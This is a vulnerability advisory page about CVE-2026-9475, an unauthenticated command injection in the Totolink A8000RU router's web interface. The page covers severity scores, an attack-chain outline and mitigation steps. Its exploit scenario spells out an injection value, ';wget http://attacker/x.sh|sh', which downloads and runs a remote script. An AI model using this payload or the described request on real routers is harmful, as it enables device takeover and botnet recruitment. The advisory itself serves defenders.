Skip to main content

Totolink A8000RU CVE-2026-9475

| EUVD-2026-31708 HIGH
OS Command Injection (CWE-78)
2026-05-25 VulDB GHSA-25hv-9wxj-cgm5
Command Injection A8000Ru
8.9
CVSS 4.0 · NVD
Share

Severity by source

NVD PRIMARY
8.9 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
X

Lifecycle Timeline

3
Analysis Generated
Jun 08, 2026 - 09:43 vuln.today
Severity Changed
May 26, 2026 - 20:07 NVD
CRITICAL HIGH
CVSS changed
May 26, 2026 - 20:07 NVD
9.8 (CRITICAL) 8.9 (HIGH)

DescriptionCVE.org

A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setIpQosRules of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. This manipulation of the argument Comment causes os command injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized.

AnalysisAI

OS command injection in the Totolink A8000RU router (firmware 7.1cu.643_b20200521) allows unauthenticated remote attackers to execute arbitrary operating system commands via the Comment parameter handled by the setIpQosRules function in /cgi-bin/cstecgi.cgi. Publicly available exploit code exists and the SSVC framework rates the technical impact as total with automatable exploitation, though no public exploit identified at time of analysis as actively exploited in the CISA KEV catalog. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Identify exposed A8000RU web interface
Delivery
Send crafted POST to /cgi-bin/cstecgi.cgi
Exploit
Inject shell metacharacters via Comment in setIpQosRules
Execution
Execute commands as router service user
Persist
Download and run secondary payload
Impact
Persist on device or join botnet
Sign in to reveal

Vulnerability AssessmentAI

Exploitation No special conditions required to exploit the web interface itself - the CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N) confirms unauthenticated remote exploitation against the default-installed Web Management Interface of Totolink A8000RU firmware 7.1cu.643_b20200521 via a single HTTP request to /cgi-bin/cstecgi.cgi with a malicious Comment parameter to setIpQosRules. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Signals are largely consistent and point to a real, actionable risk: the CVSS 4.0 vector AV:N/AC:L/AT:N/PR:N/UI:N with VC:H/VI:H/VA:H scores 8.9 because exploitation requires only network reach to the web interface with no authentication, no user interaction, and yields full confidentiality, integrity, and availability impact on the device. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker reachable to the router's web interface - for example via WAN if remote admin is enabled, or from a compromised LAN host - sends a crafted HTTP POST to /cgi-bin/cstecgi.cgi invoking setIpQosRules with a Comment value containing shell metacharacters such as `;wget http://attacker/x.sh|sh`. Because a public exploit write-up is hosted on GitHub (Litengzheng/vuldb_new2), unauthenticated mass scanning and automated weaponization are realistic, particularly for botnet operators recruiting SOHO devices.
Remediation No vendor-released patch identified at time of analysis - the references include the vendor homepage (https://www.totolink.net/) and the VulDB advisory (https://vuldb.com/vuln/365456) but no fixed firmware version. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

24 hours: Identify all A8000RU routers running firmware 7.1cu.643_b20200521 or earlier; implement firewall rules to restrict external access to management interfaces; enable detailed logging on affected devices. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-9475 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy